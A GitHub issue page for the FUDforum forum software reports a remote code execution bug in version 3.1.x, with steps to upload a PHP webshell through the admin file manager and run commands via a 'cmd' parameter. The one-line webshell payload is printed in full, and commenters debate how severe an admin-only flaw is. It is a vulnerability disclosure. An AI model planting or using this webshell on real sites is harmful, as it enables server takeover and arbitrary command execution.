search

fudforum / FUDforum

FUDforum is a super fast and scalable discussion forum. It is highly customizable and supports unlimited members, forums, posts, topics, polls & attachments. It can import XML Feeds and sync with USENET groups and Mailing Lists (bi-directional).
http://fudforum.org/
Other
37 stars 10 forks source link

Remote code execution bug #23

Open SonNguyen3496 opened 2 years ago

SonNguyen3496 commented 2 years ago

Remote code execution with File Administration System feature in Admin Control Panel Site

Affected Version- 3.1.0

Demo installation: https://localhost/FUDforum-3.1.2/

Steps to reproduce the bug: 1 : go to http://localhost/FUDforum-3.1.2/ and login with admin account

Screenshot 2022-05-15 at 18 25 26

2 : go to Admin Control panel and access to http://localhost/FUDforum-3.1.2/adm/admbrowse.php?&SQ=59a844c7073e3a8d98026d324884a119

Screenshot 2022-05-15 at 18 25 37

3 : Use File to upload Feature in File Administration System to Upload PHP Webshell PHP to Webroot Directory WebShell payload:<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Screenshot 2022-05-15 at 18 32 58

4 : Access to webshell and get remote execution code. Example : http://localhost/FUDforum-3.1.2/2test1.php?cmd=ls%20-la

Screenshot 2022-05-15 at 18 32 46
babywofl666 commented 2 years ago

Confirm that is Critical impact !

naudefj commented 2 years ago

It needs to be fixed, but it's not critical, as it requires admin access. An forum admin is unlikely to hack his/her own forum.

SonNguyen3496 commented 2 years ago

Agree with u